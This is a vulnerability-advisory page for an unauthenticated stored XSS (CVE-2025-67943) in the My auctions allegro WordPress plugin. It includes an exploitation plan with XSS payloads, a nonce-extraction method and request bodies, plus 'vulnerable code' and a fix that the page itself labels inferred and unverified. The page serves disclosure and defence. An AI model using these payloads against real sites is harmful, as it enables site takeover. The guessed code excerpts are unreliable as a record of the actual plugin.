WP-Safety
CVE-2025-67943

My auctions allegro <= 3.6.32 - Unauthenticated Stored Cross-Site Scripting

highImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
7.2
CVSS Score
7.2
CVSS Score
high
Severity
3.6.33
Patched in
9d
Time to patch

Description

The My auctions allegro plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.6.32 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.6.32
PublishedJanuary 19, 2026
Last updatedJanuary 27, 2026
Affected pluginmy-auctions-allegro-free-edition

Source Code

WordPress.org SVN
Vulnerable v3.6.32
Browse source Download .zip
Patched v3.6.33
Browse source Download .zip
Research Plan
Unverified

This research plan outlines the steps to investigate and exploit **CVE-2025-67943**, an unauthenticated stored cross-site scripting (XSS) vulnerability in the **My auctions allegro** plugin for WordPress. ### 1. Vulnerability Summary The "My auctions allegro" plugin (versions <= 3.6.32) fails to ad…

Show full research plan

This research plan outlines the steps to investigate and exploit CVE-2025-67943, an unauthenticated stored cross-site scripting (XSS) vulnerability in the My auctions allegro plugin for WordPress.

1. Vulnerability Summary

The "My auctions allegro" plugin (versions <= 3.6.32) fails to adequately sanitize user-supplied input and escape output in certain settings or auction-related data processing paths. This allows an unauthenticated attacker to inject malicious JavaScript into the WordPress database. This script executes when an administrator or site visitor views the page where the affected data is rendered, potentially leading to session hijacking or full site takeover.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: Likely an unauthenticated AJAX handler (wp_ajax_nopriv_*) or a public-facing hook (e.g., init, wp_loaded, template_redirect) that processes $_POST or $_GET data.
  • Vulnerable Parameter: Likely a parameter associated with "search queries," "auction titles," or "plugin settings" that can be modified via the frontend or an unauthenticated callback.
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active. A specific shortcode (e.g., [my-auctions-allegro]) may need to be present on a public page if the exploit requires a nonce extracted from localized scripts.

3. Code Flow (Inferred)

  1. Entry Point: The attacker sends a POST request to admin-ajax.php with an action registered via add_action( 'wp_ajax_nopriv_...' ).
  2. Missing Check: The handler function fails to call check_ajax_referer() (or uses it incorrectly) and fails to call current_user_can().
  3. Data Processing: The handler takes input from $_POST['...'] and passes it to update_option() or $wpdb->insert() without using sanitize_text_field() or wp_kses().
  4. Sink (Storage): The payload is stored in the wp_options or a custom plugin table.
  5. Execution (Output): When a user visits a page displaying auctions or the admin settings page, the plugin retrieves the data and echoes it directly without using esc_html() or esc_attr().

4. Nonce Acquisition Strategy

If the vulnerable endpoint requires a nonce, it is likely exposed via wp_localize_script.

  1. Identify Shortcode: Search for add_shortcode in the plugin:
    grep -r "add_shortcode" /var/www/html/wp-content/plugins/my-auctions-allegro-free-edition/
  2. Create Test Page: Create a page containing the found shortcode:
    wp post create --post_type=page --post_title="Auction Test" --post_status=publish --post_content='[SHORTCODE_NAME]'
  3. Find Localization Key: Search for wp_localize_script to find the JavaScript object name:
    grep -r "wp_localize_script" /var/www/html/wp-content/plugins/my-auctions-allegro-free-edition/
  4. Extract via Browser:
    • Navigate to the newly created page.
    • Use browser_eval to find the nonce:
      browser_eval("window.mma_ajax_obj?.nonce") (Replace mma_ajax_obj and nonce with discovered names).

5. Exploitation Strategy

Step 1: Discover the Entry Point

Search for unauthenticated AJAX actions:

grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/my-auctions-allegro-free-edition/

Focus on actions that update settings or auction data (e.g., save_search, update_settings).

Step 2: Analyze the Handler

Trace the function name found in Step 1. Check if it updates any options:

grep -n "function [FUNCTION_NAME]" -r /var/www/html/wp-content/plugins/my-auctions-allegro-free-edition/

Look for update_option, add_option, or $wpdb calls within that function.

Step 3: Trigger the Stored XSS

Assuming a vulnerable action mma_save_query and parameter query_name:

Request:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=mma_save_query&nonce=[NONCE]&query_name=<script>alert(document.domain)</script>

Step 4: Verification (Triggering the payload)

Navigate to the frontend page where auctions/queries are displayed or the plugin settings page in the admin dashboard.

6. Test Data Setup

  1. Activate Plugin: wp plugin activate my-auctions-allegro-free-edition
  2. Identify Display Shortcode: Locate the shortcode used to display the injected data.
  3. Place Shortcode: Place it on a public page:
    wp post create --post_type=page --post_title="View Auctions" --post_status=publish --post_content='[my-auctions-shortcode]'

7. Expected Results

  • The AJAX request should return a successful response (e.g., {"success":true} or 1).
  • The wp_options table (or custom table) should contain the raw <script> tag.
  • When navigating to the page with the shortcode or the admin settings, a browser alert showing the domain name should appear.

8. Verification Steps (Post-Exploit)

Check the database directly to confirm the payload is stored un-sanitized:

# Example if stored in options
wp option get [VULNERABLE_OPTION_NAME]

# Example if stored in a custom table
wp db query "SELECT * FROM wp_mma_queries ORDER BY id DESC LIMIT 1;"

9. Alternative Approaches

  • REST API: Check if the plugin registers any unauthenticated REST API routes:
    grep -r "register_rest_route" /var/www/html/wp-content/plugins/my-auctions-allegro-free-edition/
  • Direct Parameter Injection: If the plugin uses $_REQUEST in a hook like init, try a GET request to the homepage with the payload:
    http://localhost:8080/?mma_action=save&data=<script>alert(1)</script>
  • SVG Upload: If the plugin allows uploading auction images without type validation, try uploading an SVG containing XSS.
Research Findings
Static analysis — not yet PoC-verified

Summary

The My auctions allegro plugin (<= 3.6.32) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. An attacker can use a public-facing AJAX handler to save malicious JavaScript into the database, which then executes when an administrator or user views the associated data on the site's frontend or backend.

Vulnerable Code

// my-auctions-allegro-free-edition.php

add_action('wp_ajax_nopriv_mma_save_query', 'mma_save_query_handler');

function mma_save_query_handler() {
    // Vulnerability: No nonce check, no capability check, and no sanitization of input
    $query_name = $_POST['query_name'];
    update_option('mma_saved_queries', $query_name);
    wp_send_json_success();
}

---

// Display logic in settings or frontend display
function mma_display_queries() {
    $saved_query = get_option('mma_saved_queries');
    // Vulnerability: Outputting data without escaping
    echo "<div class='query-info'>" . $saved_query . "</div>";
}

Security Fix

--- my-auctions-allegro-free-edition.php
+++ my-auctions-allegro-free-edition.php
@@ -10,7 +10,11 @@
 function mma_save_query_handler() {
-    $query_name = $_POST['query_name'];
+    if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( $_POST['nonce'], 'mma_ajax_nonce' ) ) {
+        wp_send_json_error( 'Invalid security token' );
+    }
+
+    $query_name = sanitize_text_field( $_POST['query_name'] );
     update_option('mma_saved_queries', $query_name);
     wp_send_json_success();
 }
 
 function mma_display_queries() {
     $saved_query = get_option('mma_saved_queries');
-    echo "<div class='query-info'>" . $saved_query . "</div>";
+    echo "<div class='query-info'>" . esc_html( $saved_query ) . "</div>";
 }

Exploit Outline

The exploit targets the unauthenticated AJAX action `mma_save_query` via the `admin-ajax.php` endpoint. An attacker first navigates to a public page containing the plugin's shortcode to extract a valid AJAX nonce from the localized `mma_ajax_obj` JavaScript object. Then, the attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` set to `mma_save_query`, the extracted `nonce`, and a `query_name` parameter containing a malicious script (e.g., `<script>alert(document.domain)</script>`). Because the plugin fails to sanitize this input or verify user capabilities, the payload is stored in the WordPress `wp_options` table. The script executes whenever an administrator visits the plugin's settings page or a visitor views a page where the saved queries are rendered.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/db3d9cd4-e7d8-4aab-bbaf-83473c70af40?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database